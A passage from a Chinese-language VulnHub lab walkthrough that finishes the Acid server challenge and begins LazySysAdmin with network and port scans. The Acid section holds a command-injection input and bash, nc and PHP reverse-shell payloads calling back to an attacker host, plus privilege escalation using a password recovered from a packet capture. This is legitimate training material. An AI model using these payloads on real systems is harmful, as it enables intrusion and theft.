/></p><ul><li>步驟8:訪問low.php是個空頁面,訪問command.php,發現命令執行界面:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>可執行系統命令,輸入192.168.64.1;id 查看burpsuit的response發現id命令執行成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8247' class='md-header-anchor '></a>獲取shell</h2><ul><li>步驟9:利用php反彈shell。Windows開啟nc,監聽4444端口:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>為避免轉義和中斷,在get、post請求中輸入payload需要進行url編碼。嘗試bash反彈shell、nc反彈shell,如下payload都失敗:</p><p><code>bash -i >& /dev/tcp/192.168.64.1/4444 0>&1</code></p><p><code>nc -e /bin/bash  -d 192.168.64.1 4444</code></p><p>通過php反彈shell成功,將如下payload進行URL編碼后,在burp中發送:</p><p><code>php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p>nc成功接收反彈shelll:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>但是無法執行su命令,回顯su: must be run from a terminal 需要一個終端。沒有想出辦法,最終google了一下,找到答案:用python調用本地的shell,命令:</p><p><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py</code></p><p><code>python /tmp/asdf.py</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p>執行su成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8282' class='md-header-anchor '></a>提升權限</h2><ul><li>步驟10:查看有哪些的用戶 <code>cat /etc/passwd</code>,發現需要關注的用戶有:acid,saman,root</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/26.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟11:查找每個用戶的文件(不顯示錯誤) <code>find / -user acid 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/27.png' alt='' referrerPolicy='no-referrer' /></p><p>發現/sbin/raw_vs_isi/hint.pcapng文件,這是一個網絡流量抓包文件,將其拷貝的kali上,用Wireshark打開:</p><p><code>scp /sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/28.png' alt='' referrerPolicy='no-referrer' /></p><p>只看TCP協議的包,發現saman的密碼:1337hax0r</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/29.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟12:su提權到saman、root,獲得flag</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/30.png' alt='' referrerPolicy='no-referrer' /></p><p>再使用sudo -i 提權到root,密碼同樣是1337hax0r,獲得位於root目錄的flag.txt。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/31.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8316' class='md-header-anchor '></a>靶場思路回顧</h2><p>作者的設計思路可參考國外的一篇滲透文章:
<code>http://resources.infosecinstitute.com/acid-server-ctf-walkthroug</code>h
主要突破點是:</p><p>1.兩次目錄暴破,第一次暴破出challenge,目錄、cake.php、include.php、hacked.php,第二次暴破Magic_Box目錄發現command.php。</p><p>2.發現命令執行界面后,用php反彈shell,在http中傳輸需對payload進行url編碼。</p><p>3.su提權需要一個終端,沒有經驗只能Google解決了。</p><p>4.提權的方法是通過查找已知用戶的文件,發現其密碼,未使用exp或msf提權。</p><h2><a name='header-n8329' class='md-header-anchor '></a>思路總結</h2><p> </p><h3><a name='header-n8333' class='md-header-anchor '></a>主要收獲</h3><ol start='' ><li>命令執行漏洞可使用php反彈shell, 以前都是用bash或nc。</li><li>su提權需要一個終端,使用Python解決。</li><li>獲得shell后,多多查找各個用戶文件,可能有新發現。</li></ol><h3><a name='header-n8344' class='md-header-anchor '></a>踩到的坑</h3><ol start='' ><li>文件包含漏洞,沒找到利用方式,也找不到上傳點,無法包含獲得shell;</li><li>su提權需要一個終端,沒有知識儲備和經驗,依靠高手指導和Google搜索解決。</li><li>index.php頁面獲得郵件用戶名和密碼的方法太冷門了,如果不是看國外的教程,自己無法想到。</li><li>發現目錄就暴破下,使用御劍默認字典不行,只能使用OWASP的暴破字典,目錄暴破繞過了上面郵件用戶名和口令的登錄,可以一路暴破到命令執行頁面。</li></ol><p>總之,在沒有google搜索和他人的指導下,自己沒能獨立完成,后續需要開闊思路,多多練習。</p><p> </p><h1><a name='header-n8362' class='md-header-anchor '></a>第五節 LazySysAdmin: 1</h1><h2><a name='header-n8364' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8365' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip' target='_blank' class='url'>https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip</a></p><h3><a name='header-n8368' class='md-header-anchor '></a>運行環境</h3><ul><li>Virtualbox (二選一)</li><li>Vnware Workstation player</li></ul><h3><a name='header-n8376' class='md-header-anchor '></a>通關提示</h3><ul><li>Enumeration is key</li><li>Try Harder</li><li>Look in front of you</li><li>Tweet @togiemcdogie if you need more hints</li></ul><h2><a name='header-n8390' class='md-header-anchor '></a>信息收集</h2><h3><a name='header-n8391' class='md-header-anchor '></a>ip發現</h3><p>在內網主機探測中,可以使用netdiscover來進行。</p><p>netdiscover -i wlo1</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 netdiscover <span class="cm-attribute">-i</span> wlo1</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Currently scanning: <span class="cm-number">192</span>.168.21.0/16   |   Screen View: Unique Hosts             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                                                                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">1</span> Captured ARP Req/Rep packets, from <span class="cm-number">1</span> hosts.   Total size: <span class="cm-number">42</span>                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> _____________________________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-attribute">-----------------------------------------------------------------------------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">192</span>.168.0.100   <span class="cm-number">08</span>:00:27:da:8a:ac      <span class="cm-number">1</span>      <span class="cm-number">42</span>  PCS Systemtechnik GmbH</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 215px;"></div><div class="CodeMirror-gutters" style="display: none; height: 245px;"></div></div></div></pre><h3><a name='header-n8397' class='md-header-anchor '></a>端口掃描</h3><p>使用masscan掃描</p><p>masscan 192.168.0.100 -p 1-10000 --rate=1000</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 masscan <span class="cm-number">192</span>.168.0.100 <span class="cm-attribute">-p</span> <span class="cm-number">1</span><span class="cm-attribute">-10000</span> <span class="cm-attribute">--rate</span><span class="cm-operator">=</span><span class="cm-number">1000</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting masscan <span class="cm-number">1</span>.0.3 (http://bit.ly/14GZzcT) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span class="cm-number">12</span>:53:27 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-attribute">--</span> forced options: <span class="cm-attribute">-sS</span> <span class="cm-attribute">-Pn</span> <span class="cm-attribute">-n</span> <span class="cm-attribute">--randomize-hosts</span> <span class="cm-attribute">-v</span> <span class="cm-attribute">--send-eth</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating SYN Stealth Scan</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning <span class="cm-number">1</span> hosts [10000 ports/host]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100                                   </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100                                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100                                   </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 284px;"></div><div class="CodeMirror-gutters" style="display: none; height: 314px;"></div></div></div></pre><p>使用nmap掃描</p><p>nmap -T4 -A -v 192.168.0.100 -p 0-10000</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 nmap <span class="cm-attribute">-T4</span> <span class="cm-attribute">-A</span> <span class="cm-attribute">-v</span> <span class="cm-number">192</span>.168.0.31 <span class="cm-attribute">-p0-10000</span>        </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting Nmap <span class="cm-number">7</span>.50 ( https://nmap.org ) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span class="cm-number">20</span>:55 CST</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">PORT     STATE SERVICE     VERSION</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">22</span>/tcp   open  <span class="cm-builtin">ssh</span>         OpenSSH <span class="cm-number">6</span>.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol <span class="cm-number">2</span>.0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| ssh-hostkey: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">1024</span> b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">2048</span> <span class="cm-number">58</span>:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">256</span> <span class="cm-number">61</span>:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  <span class="cm-number">256</span> 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">80</span>/tcp   open  http        Apache httpd <span class="cm-number">2</span>.4.7 ((Ubuntu))</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-generator: Silex v2.2.7</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-methods: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  Supported Methods: GET HEAD POST OPTIONS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-robots.txt: <span class="cm-number">4</span> disallowed entries </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_/old/ /test/ /TR2/ /Backnode_files/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-server-header: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-title: Backnode</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">139</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">3</span>.X <span class="cm-attribute">-</span> <span class="cm-number">4</span>.X (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">445</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">4</span>.3.11-Ubuntu (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">3306</span>/tcp open  mysql       MySQL (unauthorized)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">6667</span>/tcp open  irc         InspIRCd</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| irc-info: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   server: Admin.local</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   users: <span class="cm-number">1</span>.0</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   servers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   chans: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lusers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lservers: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> ident: nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> host: <span class="cm-number">192</span>.168.2.107</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  error: Closing link: (nmap@192.168.2.107) [Client exited]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">MAC Address: <span class="cm-number">08</span>:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Device type: general purpose</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Running: Linux <span class="cm-number">3</span>.X|4.X</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS details: Linux <span class="cm-number">3</span>.2 <span class="cm-attribute">-</span> <span class="cm-number">4</span>.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Uptime guess: <span class="cm-number">0</span>.008 days (since Wed Jan <span class="cm-number">31</span> <span class="cm-number">20</span>:44:16 <span class="cm-number">2018</span>)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Network Distance: <span class="cm-number">1</span> hop</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TCP Sequence Prediction: <span class="cm-def">Difficulty</span><span class="cm-operator">=</span><span class="cm-number">261</span> (Good luck!)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">IP ID Sequence Generation: All zeros</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Host script results:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Names:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<00>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<03>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<20>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   WORKGROUP<00>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  WORKGROUP<1e>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-os-discovery: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   OS: Windows <span class="cm-number">6</span>.1 (Samba <span class="cm-number">4</span>.3.11-Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Computer name: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   NetBIOS computer name: LAZYSYSADMIN\x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Domain name: \x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   FQDN: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  System time: <span class="cm-number">2018</span><span class="cm-attribute">-01-31T22</span>:55:23<span class="cm-operator">+</span><span class="cm-number">10</span>:00</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-security-mode: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   account_used: guest</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   authentication_level: user</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   challenge_response: supported</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  message_signing: disabled (dangerous, but default)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_smbv2-enabled: Server supports SMBv2 protocol</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TRACEROUTE</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HOP RTT     ADDRESS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">1</span>   <span class="cm-number">0</span>.50 ms LazySysAdmin.lan (192.168.0.100)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NSE: Script Post-scanning.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Read data files from: /usr/bin/../share/nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Nmap <span class="cm-keyword">done</span>: <span class="cm-number">1</span> IP address (1 host up) scanned <span class="cm-keyword">in</span> <span class="cm-number">31</span>.19 seconds</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           Raw packets sent: <span class="cm-number">11045</span> (487.680KB) | Rcvd: <span class="cm-number">11034</span> (442.816KB)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 2032px;"></div><div class="CodeMirror-gutters" style="display: none; height: 2062px;"></div></div></div></pre><p>對比可發現masscan掃描端口的速度比nmap快很多,但是想要知道端口所運行服務的具體信息,就要用到nmap了。根據掃描結果可知目標機開啟了22、80、139、445、3306、6667這幾個端口。</p><p>先從web入手,使用dirb來爆破目標存在的目錄(dirb安裝方法附在文章最后)</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 ./dirb http://192.168.0.100 wordlists/common.txt <span class="cm-attribute">-o</span> /home/evilk0/Desktop/result.txt</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">用法:./dirb 目標url 用於爆破的目錄  <span class="cm-attribute">-o</span> 輸出文件</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 